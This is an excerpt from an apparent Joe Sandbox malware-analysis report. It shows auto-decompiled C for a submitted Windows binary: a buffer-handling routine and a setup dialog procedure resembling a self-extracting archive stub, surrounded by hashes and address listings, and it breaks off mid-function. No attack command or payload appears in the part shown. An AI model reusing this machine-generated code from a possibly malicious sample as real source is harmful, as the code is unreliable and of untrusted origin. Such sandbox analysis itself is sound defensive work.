                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                    • Instruction ID: 8028973fb022e60138ddea80e6a117f7bfa10d7d337e0f4e64088a8a45399b0c
                                                    • Opcode Fuzzy Hash: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD6CDC Relevance: .3, Instructions: 343COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CD6CDC(signed int __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t176;
				signed int _t179;
				intOrPtr _t182;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				void* _t217;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				signed int _t230;
				signed int _t232;
				intOrPtr _t235;
				intOrPtr* _t236;
				intOrPtr* _t242;
				intOrPtr* _t244;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t257;
				signed int _t265;
				intOrPtr* _t269;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				intOrPtr* _t282;
				void* _t283;
				signed int _t284;
				intOrPtr* _t285;
				intOrPtr _t287;
				void* _t289;
				void* _t290;
				void* _t292;

				_t223 = __ecx; // executed
				E00CD359E(__ecx, __edx); // executed
				E00CD4D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
				_t282 = _t223 + 0x18;
				_t249 = 0;
				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				} else {
					_t247 = 0;
					do {
						_t220 =  *_t282;
						_t247 = _t247 + 0x4ae4;
						_t249 = _t249 + 1;
						 *((char*)(_t220 + _t247 - 0x13)) = 0;
						 *((char*)(_t220 + _t247 - 0x11)) = 0;
					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
				}
				_t226 = 5;
				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
				E00CE0320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
				_t292 = _t290 + 0x18;
				 *(_t292 + 0x30) = 0;
				_t265 = 0;
				 *((char*)(_t292 + 0x1b)) = 0;
				 *((char*)(_t292 + 0x13)) = 0;
				while(1) {
					L6:
					_t272 = 0;
					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
					while(1) {
						L7:
						_push(0x00400000 - _t265 & 0xfffffff0);
						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
						_t166 = E00CCD114( *_t223);
						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
						if(_t166 < 0) {
							break;
						}
						_t265 = _t265 + _t166;
						 *(_t292 + 0x2c) = _t265;
						if(_t265 != 0) {
							if(_t166 <= 0 || _t265 >= 0x400) {
								if(_t272 >= _t265) {
									goto L69;
								} else {
									while(1) {
										_t252 = 0;
										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
										 *(_t292 + 0x24) = 0;
										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
										if(_t176 != 0) {
										}
										L13:
										_t235 = 0;
										 *((intOrPtr*)(_t292 + 0x20)) = 0;
										while(1) {
											_t280 =  *_t282 + _t235;
											 *(_t292 + 0x30) = _t252;
											_t29 = _t280 + 4; // 0x4
											_t236 = _t29;
											 *_t280 = _t223;
											if( *((char*)(_t280 + 0x4ad3)) == 0) {
												goto L16;
											}
											L15:
											 *(_t280 + 0x4acc) = _t265;
											L18:
											_t42 = _t280 + 0x18; // 0x18
											_t285 = _t42;
											 *((char*)(_t280 + 0x4ad3)) = 0;
											 *(_t280 + 0x4ae0) = _t252;
											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
											if( *((char*)(_t280 + 0x14)) != 0) {
												L23:
												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
													 *((char*)(_t280 + 0x4ad1)) = 1;
													 *((char*)(_t292 + 0x1b)) = 1;
												} else {
													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
												}
												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
												_t252 = _t252 + 1;
												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
												 *(_t292 + 0x24) = _t252;
												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
												_t217 = _t265 - _t287;
												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
													if(_t217 >= 0x400) {
														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
														if(_t252 < _t176) {
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t280 =  *_t282 + _t235;
															 *(_t292 + 0x30) = _t252;
															_t29 = _t280 + 4; // 0x4
															_t236 = _t29;
															 *_t280 = _t223;
															if( *((char*)(_t280 + 0x4ad3)) == 0) {
																goto L16;
															}
														}
													}
												}
											} else {
												_push(_t285);
												_push(_t236);
												 *((char*)(_t280 + 0x14)) = 1;
												if(E00CD3E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
													 *((char*)(_t292 + 0x13)) = 1;
												} else {
													_t252 =  *(_t292 + 0x24);
													 *((char*)(_t223 + 0xe662)) = 1;
													goto L23;
												}
											}
											break;
											L16:
											E00CCA85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
											_t33 = _t280 + 4; // 0x4
											_t236 = _t33;
											 *((intOrPtr*)(_t236 + 4)) = 0;
											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
											__eflags = _t176;
											 *_t236 = 0;
											 *(_t280 + 0x4acc) = _t176;
											if(_t176 != 0) {
												 *((char*)(_t280 + 0x4ad0)) = 0;
												 *((char*)(_t280 + 0x14)) = 0;
												 *((char*)(_t280 + 0x2c)) = 0;
												_t252 =  *(_t292 + 0x24);
												goto L18;
											}
											break;
										}
										L33:
										_t232 =  *(_t292 + 0x28);
										_t275 = _t232 /  *(_t223 + 0x1c);
										_t179 = _t232;
										__eflags = _t179 %  *(_t223 + 0x1c);
										if(_t179 %  *(_t223 + 0x1c) != 0) {
											_t275 = _t275 + 1;
											__eflags = _t275;
										}
										_t283 = 0;
										__eflags = _t232;
										if(_t232 != 0) {
											_t269 =  *((intOrPtr*)(_t292 + 0x14));
											_t257 = 0;
											_t202 = _t275 * 0x4ae4;
											__eflags = _t202;
											 *((intOrPtr*)(_t292 + 0x20)) = 0;
											 *(_t292 + 0x38) = _t202;
											_t203 = _t292 + 0x40;
											do {
												_t258 = _t257 +  *_t269;
												_t244 = _t203;
												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
												_t206 =  *(_t292 + 0x28) - _t283;
												 *_t244 = _t257 +  *_t269;
												__eflags = _t275 - _t206;
												if(_t275 < _t206) {
													_t206 = _t275;
												}
												__eflags =  *(_t292 + 0x24) - 1;
												 *(_t244 + 4) = _t206;
												if( *(_t292 + 0x24) != 1) {
													E00CD0F86( *((intOrPtr*)(_t223 + 0x14)), E00CD77C0, _t244);
												} else {
													E00CD7153(_t223, _t258);
												}
												_t283 = _t283 + _t275;
												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
												__eflags = _t283 -  *(_t292 + 0x28);
											} while (_t283 <  *(_t292 + 0x28));
											_t265 =  *(_t292 + 0x2c);
										}
										_t284 =  *(_t292 + 0x24);
										__eflags = _t284;
										if(_t284 == 0) {
											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
											goto L68;
										} else {
											E00CD11CF( *((intOrPtr*)(_t223 + 0x14)));
											_t276 = 0;
											__eflags = _t284;
											if(_t284 == 0) {
												L55:
												__eflags =  *((char*)(_t292 + 0x13));
												if( *((char*)(_t292 + 0x13)) == 0) {
													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
													_t278 = _t265 - _t182;
													__eflags = _t278 - 0x400;
													if(_t278 < 0x400) {
														__eflags = _t278;
														if(__eflags >= 0) {
															if(__eflags > 0) {
																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
																E00CE0320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
																_t292 = _t292 + 0xc;
															}
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t265 = _t278;
															goto L6;
														}
													} else {
														_t282 =  *((intOrPtr*)(_t292 + 0x14));
														_t272 = _t182;
														__eflags = _t272 - _t265;
														if(_t272 >= _t265) {
															goto L7;
														} else {
															_t252 = 0;
															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
															 *(_t292 + 0x24) = 0;
															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
															if(_t176 != 0) {
															}
															goto L33;
														}
													}
												}
											} else {
												_t185 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t292 + 0x20)) = 0;
												do {
													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
													__eflags =  *((char*)(_t289 + 0x4ad1));
													if( *((char*)(_t289 + 0x4ad1)) != 0) {
														L50:
														_t186 = E00CD77EF(_t223, _t289);
														__eflags = _t186;
														if(_t186 != 0) {
															goto L51;
														}
													} else {
														_t201 = E00CD390D(_t223, _t289);
														__eflags = _t201;
														if(_t201 != 0) {
															__eflags =  *((char*)(_t289 + 0x4ad1));
															if( *((char*)(_t289 + 0x4ad1)) == 0) {
																L51:
																__eflags =  *((char*)(_t289 + 0x4ad0));
																if( *((char*)(_t289 + 0x4ad0)) == 0) {
																	__eflags =  *((char*)(_t289 + 0x4ad3));
																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
																		__eflags = _t265 - _t189;
																		if(_t265 > _t189) {
																			_t265 = _t265 - _t189;
																			 *(_t292 + 0x38) = _t265;
																			E00CE0320(_t241, _t189 + _t241, _t265);
																			_t292 = _t292 + 0xc;
																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
																			__eflags = _t276;
																			if(_t276 != 0) {
																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
																				E00CE0320(_t196, _t289, 0x4ae4);
																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
																				_t292 = _t292 + 0xc;
																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
																				_t265 =  *(_t292 + 0x2c);
																				 *((char*)(_t289 + 0x4ad3)) = 0;
																			}
																			_t272 = 0;
																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
																			L68:
																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
																			goto L69;
																		}
																	} else {
																		__eflags =  *((char*)(_t289 + 0x28));
																		if( *((char*)(_t289 + 0x28)) == 0) {
																			goto L54;
																		}
																	}
																}
															} else {
																goto L50;
															}
														}
													}
													goto L70;
													L54:
													_t276 = _t276 + 1;
													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
													__eflags = _t276 -  *(_t292 + 0x24);
												} while (_t276 <  *(_t292 + 0x24));
												goto L55;
											}
										}
										goto L70;
									}
								}
							} else {
								L69:
								__eflags =  *((char*)(_t292 + 0x13));
								if( *((char*)(_t292 + 0x13)) == 0) {
									continue;
								}
							}
						}
						break;
					}
					L70:
					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
					E00CD5202(_t223);
					_t250 =  *(_t292 + 0x30) * 0x4ae4;
					_t230 = 5;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
					__eflags = _t170 + _t250 + 0x30;
					return E00CE0320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
				}
			}















































                                                    0x00cd6ce6
                                                    0x00cd6ce8
                                                    0x00cd6cf6
                                                    0x00cd6cfe
                                                    0x00cd6d01
                                                    0x00cd6d03
                                                    0x00cd6d09
                                                    0x00cd6d2c
                                                    0x00cd6d0b
                                                    0x00cd6d0b
                                                    0x00cd6d0d
                                                    0x00cd6d0d
                                                    0x00cd6d10
                                                    0x00cd6d16
                                                    0x00cd6d17
                                                    0x00cd6d1c
                                                    0x00cd6d26
                                                    0x00cd6d2a
                                                    0x00cd6d3b
                                                    0x00cd6d4b
                                                    0x00cd6d54
                                                    0x00cd6d5b
                                                    0x00cd6d5e
                                                    0x00cd6d62
                                                    0x00cd6d64
                                                    0x00cd6d68
                                                    0x00cd6d6c
                                                    0x00cd6d6c
                                                    0x00cd6d6c
                                                    0x00cd6d6e
                                                    0x00cd6d72
                                                    0x00cd6d72
                                                    0x00cd6d7e
                                                    0x00cd6d84
                                                    0x00cd6d85
                                                    0x00cd6d8a
                                                    0x00cd6d90
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6d96
                                                    0x00cd6d98
                                                    0x00cd6d9c
                                                    0x00cd6da4
                                                    0x00cd6db4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6dba
                                                    0x00cd6dbd
                                                    0x00cd6dbf
                                                    0x00cd6dc3
                                                    0x00cd6dc7
                                                    0x00cd6dc9
                                                    0x00cd6dc9
                                                    0x00cd6dcf
                                                    0x00cd6dcf
                                                    0x00cd6dd1
                                                    0x00cd6dd5
                                                    0x00cd6dd8
                                                    0x00cd6dda
                                                    0x00cd6de5
                                                    0x00cd6de5
                                                    0x00cd6de8
                                                    0x00cd6dea
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6dec
                                                    0x00cd6dec
                                                    0x00cd6e2d
                                                    0x00cd6e32
                                                    0x00cd6e32
                                                    0x00cd6e35
                                                    0x00cd6e3f
                                                    0x00cd6e49
                                                    0x00cd6e4f
                                                    0x00cd6e80
                                                    0x00cd6e85
                                                    0x00cd6e96
                                                    0x00cd6e9d
                                                    0x00cd6e90
                                                    0x00cd6e90
                                                    0x00cd6e90
                                                    0x00cd6eb0
                                                    0x00cd6eb2
                                                    0x00cd6eb3
                                                    0x00cd6eb7
                                                    0x00cd6ebd
                                                    0x00cd6ec3
                                                    0x00cd6ec7
                                                    0x00cd6ec9
                                                    0x00cd6ed6
                                                    0x00cd6edb
                                                    0x00cd6edf
                                                    0x00cd6ee1
                                                    0x00cd6dd8
                                                    0x00cd6dda
                                                    0x00cd6de5
                                                    0x00cd6de5
                                                    0x00cd6de8
                                                    0x00cd6dea
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6dea
                                                    0x00cd6edf
                                                    0x00cd6ed6
                                                    0x00cd6e51
                                                    0x00cd6e51
                                                    0x00cd6e52
                                                    0x00cd6e55
                                                    0x00cd6e60
                                                    0x00cd6eea
                                                    0x00cd6e75
                                                    0x00cd6e75
                                                    0x00cd6e79
                                                    0x00000000
                                                    0x00cd6e79
                                                    0x00cd6e60
                                                    0x00000000
                                                    0x00cd6df4
                                                    0x00cd6dfc
                                                    0x00cd6e03
                                                    0x00cd6e03
                                                    0x00cd6e08
                                                    0x00cd6e0b
                                                    0x00cd6e0b
                                                    0x00cd6e0f
                                                    0x00cd6e11
                                                    0x00cd6e17
                                                    0x00cd6e1d
                                                    0x00cd6e23
                                                    0x00cd6e26
                                                    0x00cd6e29
                                                    0x00000000
                                                    0x00cd6e29
                                                    0x00000000
                                                    0x00cd6e17
                                                    0x00cd6eef
                                                    0x00cd6eef
                                                    0x00cd6efc
                                                    0x00cd6efe
                                                    0x00cd6f03
                                                    0x00cd6f05
                                                    0x00cd6f07
                                                    0x00cd6f07
                                                    0x00cd6f07
                                                    0x00cd6f08
                                                    0x00cd6f0a
                                                    0x00cd6f0c
                                                    0x00cd6f0e
                                                    0x00cd6f12
                                                    0x00cd6f14
                                                    0x00cd6f14
                                                    0x00cd6f1a
                                                    0x00cd6f1e
                                                    0x00cd6f22
                                                    0x00cd6f26
                                                    0x00cd6f26
                                                    0x00cd6f28
                                                    0x00cd6f2d
                                                    0x00cd6f35
                                                    0x00cd6f37
                                                    0x00cd6f39
                                                    0x00cd6f3b
                                                    0x00cd6f3d
                                                    0x00cd6f3d
                                                    0x00cd6f3f
                                                    0x00cd6f44
                                                    0x00cd6f47
                                                    0x00cd6f5c
                                                    0x00cd6f49
                                                    0x00cd6f4c
                                                    0x00cd6f4c
                                                    0x00cd6f65
                                                    0x00cd6f67
                                                    0x00cd6f6b
                                                    0x00cd6f6f
                                                    0x00cd6f73
                                                    0x00cd6f73
                                                    0x00cd6f79
                                                    0x00cd6f79
                                                    0x00cd6f7d
                                                    0x00cd6f81
                                                    0x00cd6f83
                                                    0x00cd70eb
                                                    0x00000000
                                                    0x00cd6f89
                                                    0x00cd6f8c
                                                    0x00cd6f91
                                                    0x00cd6f93
                                                    0x00cd6f95
                                                    0x00cd700b
                                                    0x00cd700b
                                                    0x00cd7010
                                                    0x00cd7016
                                                    0x00cd701c
                                                    0x00cd701e
                                                    0x00cd7024
                                                    0x00cd70ca
                                                    0x00cd70cc
                                                    0x00cd70ce
                                                    0x00cd70d3
                                                    0x00cd70d8
                                                    0x00cd70dd
                                                    0x00cd70dd
                                                    0x00cd70e0
                                                    0x00cd70e4
                                                    0x00000000
                                                    0x00cd70e4
                                                    0x00cd702a
                                                    0x00cd702a
                                                    0x00cd702e
                                                    0x00cd7030
                                                    0x00cd7032
                                                    0x00000000
                                                    0x00cd7038
                                                    0x00cd6dbd
                                                    0x00cd6dbf
                                                    0x00cd6dc3
                                                    0x00cd6dc7
                                                    0x00cd6dc9
                                                    0x00cd6dc9
                                                    0x00000000
                                                    0x00cd6dc9
                                                    0x00cd7032
                                                    0x00cd7024
                                                    0x00cd6f97
                                                    0x00cd6f97
                                                    0x00cd6f97
                                                    0x00cd6f99
                                                    0x00cd6f9d
                                                    0x00cd6fa3
                                                    0x00cd6fa5
                                                    0x00cd6fac
                                                    0x00cd6fc7
                                                    0x00cd6fca
                                                    0x00cd6fcf
                                                    0x00cd6fd1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6fae
                                                    0x00cd6fb1
                                                    0x00cd6fb6
                                                    0x00cd6fb8
                                                    0x00cd6fbe
                                                    0x00cd6fc5
                                                    0x00cd6fd7
                                                    0x00cd6fd7
                                                    0x00cd6fde
                                                    0x00cd6fe4
                                                    0x00cd6feb
                                                    0x00cd7040
                                                    0x00cd7045
                                                    0x00cd7048
                                                    0x00cd704a
                                                    0x00cd7050
                                                    0x00cd7057
                                                    0x00cd705b
                                                    0x00cd7063
                                                    0x00cd7069
                                                    0x00cd706c
                                                    0x00cd7070
                                                    0x00cd7077
                                                    0x00cd707b
                                                    0x00cd707e
                                                    0x00cd7080
                                                    0x00cd708c
                                                    0x00cd709b
                                                    0x00cd70a0
                                                    0x00cd70a4
                                                    0x00cd70a9
                                                    0x00cd70b1
                                                    0x00cd70b7
                                                    0x00cd70bb
                                                    0x00cd70bb
                                                    0x00cd70c2
                                                    0x00cd70c4
                                                    0x00cd70ef
                                                    0x00cd70ef
                                                    0x00000000
                                                    0x00cd70ef
                                                    0x00cd6fed
                                                    0x00cd6fed
                                                    0x00cd6ff1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6ff1
                                                    0x00cd6feb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6fc5
                                                    0x00cd6fb8
                                                    0x00000000
                                                    0x00cd6ff7
                                                    0x00cd6ffb
                                                    0x00cd6ffc
                                                    0x00cd7001
                                                    0x00cd7005
                                                    0x00cd7005
                                                    0x00000000
                                                    0x00cd6f9d
                                                    0x00cd6f95
                                                    0x00000000
                                                    0x00cd6f83
                                                    0x00cd6dba
                                                    0x00cd70f3
                                                    0x00cd70f3
                                                    0x00cd70f3
                                                    0x00cd70f8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd70f8
                                                    0x00cd6da4
                                                    0x00000000
                                                    0x00cd6d9c
                                                    0x00cd70fe
                                                    0x00cd7106
                                                    0x00cd7109
                                                    0x00cd710e
                                                    0x00cd7122
                                                    0x00cd7128
                                                    0x00cd7132
                                                    0x00cd7150
                                                    0x00cd7150

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 4fef0463c55561e4cb0853f78efe14c9b1eac8b2687300ff5efe79ce0afecbeb
                                                    • Instruction ID: 8e38d2af33534c81c1ed77906e0c655307167e88fbd08b26ed188992bed0657c
                                                    • Opcode Fuzzy Hash: 4fef0463c55561e4cb0853f78efe14c9b1eac8b2687300ff5efe79ce0afecbeb
                                                    • Instruction Fuzzy Hash: 8CD1F8B16083408FDB14CF28C98475BBBE1BF89308F08456EFA999B342D774EA05CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00CDB7E0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* _t105;
				int _t106;
				long _t108;
				long _t109;
				struct HWND__* _t110;
				struct HWND__* _t114;
				void* _t117;
				void* _t118;
				void* _t135;
				void* _t139;
				signed int _t152;
				struct HWND__* _t155;
				void* _t173;
				int _t186;
				signed int _t201;
				void* _t202;
				long _t210;
				void* _t220;
				void* _t234;
				signed int _t244;
				void* _t245;
				void* _t260;
				long _t262;
				long _t263;
				long _t264;
				int _t278;
				int _t280;
				void* _t285;
				void* _t289;
				int _t293;
				void* _t296;
				WCHAR* _t298;
				intOrPtr _t299;
				intOrPtr _t300;
				struct HWND__* _t311;
				intOrPtr _t314;
				void* _t316;
				struct HWND__* _t317;
				void* _t318;
				struct HWND__* _t320;
				long _t321;
				struct HWND__* _t322;
				intOrPtr _t323;
				void* _t325;
				void* _t327;
				void* _t328;
				void* _t330;

				_t309 = __edx;
				_t296 = __ecx;
				E00CDEB78(0xcf2b04, _t328);
				E00CDEC50(0xfe80);
				_t314 =  *((intOrPtr*)(_t328 + 0xc));
				_t311 =  *(_t328 + 8);
				_t105 = E00CC1316(__edx, _t311, _t314,  *(_t328 + 0x10),  *((intOrPtr*)(_t328 + 0x14)), L"STARTDLG", 0, 0);
				_t293 = 1;
				if(_t105 != 0) {
					L128:
					_t106 = _t293;
					L129:
					 *[fs:0x0] =  *((intOrPtr*)(_t328 - 0xc));
					return _t106;
				}
				_t316 = _t314 - 0x110;
				if(_t316 == 0) {
					_push(_t311);
					E00CDD69E(_t296, __edx, __eflags, __fp0);
					_t108 =  *0xd17b7c;
					 *0xd08450 = _t311;
					 *0xd08458 = _t311;
					__eflags = _t108;
					if(_t108 != 0) {
						SendMessageW(_t311, 0x80, 1, _t108); // executed
					}
					_t109 =  *0xd1ec84;
					__eflags = _t109;
					if(_t109 != 0) {
						SendDlgItemMessageW(_t311, 0x6c, 0x172, 0, _t109); // executed
					}
					_t110 = GetDlgItem(_t311, 0x68);
					 *(_t328 - 0x14) = _t110;
					SendMessageW(_t110, 0x435, 0, 0x400000);
					E00CDA64D(_t328 - 0x3474, 0x800);
					_t114 = GetDlgItem(_t311, 0x66);
					__eflags =  *0xd0a472;
					_t317 = _t114;
					 *(_t328 - 0x18) = _t317;
					_t298 = 0xd0a472;
					if( *0xd0a472 == 0) {
						_t298 = _t328 - 0x3474;
					}
					SetWindowTextW(_t317, _t298);
					E00CDABAB(_t317); // executed
					_push(0xd1fca0);
					_push(0xd1fc90);
					_push(0xd1ec90);
					_push(_t311);
					 *0xd08463 = 0; // executed
					_t117 = E00CDB093(_t298, _t309, __eflags); // executed
					__eflags = _t117;
					if(_t117 == 0) {
						 *0xd08456 = _t293;
					}
					__eflags =  *0xd1fca0;
					if( *0xd1fca0 > 0) {
						_push(7);
						_push( *0xd1fc90);
						_push(_t311);
						E00CDC73F(_t309, _t311);
					}
					__eflags =  *0xd0c577;
					if( *0xd0c577 == 0) {
						SetDlgItemTextW(_t311, 0x6b, E00CCE617(0xbf));
						SetDlgItemTextW(_t311, _t293, E00CCE617(0xbe));
					}
					__eflags =  *0xd1fca0;
					if( *0xd1fca0 <= 0) {
						L104:
						__eflags =  *0xd08463;
						if( *0xd08463 != 0) {
							L116:
							__eflags =  *0xd0a46c - 2;
							if( *0xd0a46c == 2) {
								EnableWindow(_t317, 0);
							}
							__eflags =  *0xd09468;
							if( *0xd09468 != 0) {
								E00CC12D3(_t311, 0x67, 0);
								E00CC12D3(_t311, 0x66, 0);
							}
							_t118 =  *0xd0a46c;
							__eflags = _t118;
							if(_t118 != 0) {
								__eflags =  *0xd08454;
								if( *0xd08454 == 0) {
									_push(0);
									_push(_t293);
									_push(0x111);
									_push(_t311);
									__eflags = _t118 - _t293;
									if(_t118 != _t293) {
										 *0xd230a0();
									} else {
										SendMessageW(); // executed
									}
								}
							}
							__eflags =  *0xd08456;
							if( *0xd08456 != 0) {
								_push(E00CCE617(0x90));
								_push(_t293);
								L127:
								SetDlgItemTextW(_t311, ??, ??);
							}
							goto L128;
						}
						__eflags =  *0xd1fc94;
						if( *0xd1fc94 != 0) {
							goto L116;
						}
						__eflags =  *0xd0a46c;
						if( *0xd0a46c != 0) {
							goto L116;
						}
						__eflags = 0;
						_t318 = 0xaa;
						 *((short*)(_t328 - 0x7874)) = 0;
						goto L108;
						do {
							while(1) {
								L108:
								__eflags = _t318 - 0xaa;
								if(_t318 != 0xaa) {
									goto L110;
								}
								__eflags =  *0xd0c577;
								if( *0xd0c577 == 0) {
									break;
								}
								L110:
								__eflags = _t318 - 0xab;
								if(__eflags != 0) {
									L113:
									E00CD05DA(__eflags, _t328 - 0x7874, " ", 0x2000);
									E00CD05DA(__eflags, _t328 - 0x7874, E00CCE617(_t318), 0x2000);
									break;
								}
								__eflags =  *0xd0c577;
								if(__eflags == 0) {
									goto L113;
								}
								_t318 = _t318 + 1;
							}
							_t318 = _t318 + 1;
							__eflags = _t318 - 0xb0;
						} while (__eflags <= 0);
						_t299 =  *0xd08440; // 0x0
						E00CD9ED5(_t299, __eflags,  *0xd0102c,  *(_t328 - 0x14), _t328 - 0x7874, 0, 0);
						_t317 =  *(_t328 - 0x18);
						goto L116;
					} else {
						_push(0);
						_push( *0xd1fc90);
						_push(_t311); // executed
						E00CDC73F(_t309, _t311); // executed
						_t135 =  *0xd1fc94;
						__eflags = _t135;
						if(_t135 != 0) {
							__eflags =  *0xd0a46c;
							if(__eflags == 0) {
								_t300 =  *0xd08440; // 0x0
								E00CD9ED5(_t300, __eflags,  *0xd0102c,  *(_t328 - 0x14), _t135, 0, 0);
								L00CE3E2E( *0xd1fc94);
							}
						}
						__eflags =  *0xd0a46c - _t293;
						if( *0xd0a46c == _t293) {
							L103:
							_push(_t293);
							_push( *0xd1fc90);
							_push(_t311);
							E00CDC73F(_t309, _t311);
							goto L104;
						} else {
							 *0xd230c0(_t311);
							__eflags =  *0xd0a46c - _t293;
							if( *0xd0a46c == _t293) {
								goto L103;
							}
							__eflags =  *0xd0a471;
							if( *0xd0a471 != 0) {
								goto L103;
							}
							_push(3);
							_push( *0xd1fc90);
							_push(_t311);
							E00CDC73F(_t309, _t311);
							__eflags =  *0xd1fc98;
							if( *0xd1fc98 == 0) {
								goto L103;
							}
							_t139 = DialogBoxParamW( *0xd0102c, L"LICENSEDLG", 0, E00CDB5C0, 0);
							__eflags = _t139;
							if(_t139 == 0) {
								L23:
